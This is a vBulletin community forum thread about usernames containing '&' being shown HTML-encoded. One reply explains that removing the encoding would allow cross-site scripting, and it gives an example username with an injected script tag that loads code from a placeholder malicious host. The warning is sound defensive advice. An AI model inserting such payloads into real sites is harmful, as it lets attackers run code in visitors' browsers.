X
Collapse
First Prev Next Last

• Filter
  • Time
  • Show
Clear All

How to fix usernames with '&' turning to '&amp'

I have a user that chose the nickname M&M, and in the 'Welcome to our newest member' their nickname appears as M&m.

So far I didn't find this issue appearing anywhere else in the site but I guess it might.

I have checked the default (unedited) style, with the original English language and the issue persists.

Click image for larger version

Name:	amp.JPG
Views:	152
Size:	8.6 KB
ID:	14586

Is there anyway to fix this?

Many thanks

I brought this up on the VB forum once but can't seem to locate it now. This even happens on that forum, and I was told that some sort of internal change needed to happen. They were in no hurry to correct it and I believe it was logged as an improvement request.

Comment

Thanks, I'll try to find it myself.

You are right, I've seen this very issue on their mobile app, some of their forum names have & in them.

Comment

Fixing the ampersand issue in the username can be done by not HTML-encoding the username. But this will open an XSS vulnerability as any user can add dangerous HTML tags in the username such as <script></script> tags. For example: Good<script src="https://badsite.com/maliciouscode.js"></script>Boy
        Helpful? Donate. Thanks!
        Buy me a coffeePayPal QR Code
        Fast VPS Host for vBulletin:
        A2 Hosting & IONOS

Comment

Users Viewing This Page

Collapse

There is 1 user viewing this forum topic.

• Guest Guest

Latest Posts

Collapse

Working...
        X
        Searching...Please wait.
        An unexpected error was returned: 'Your submission could not be processed because you have logged in since the previous page was loaded.

Please push the back button and reload the previous window.'
        An unexpected error was returned: 'Your submission could not be processed because the token has expired.

Please push the back button and reload the previous window.'
        An internal error has occurred and the module cannot be displayed.
        There are no results that meet this criteria.
        Search Result for "|||"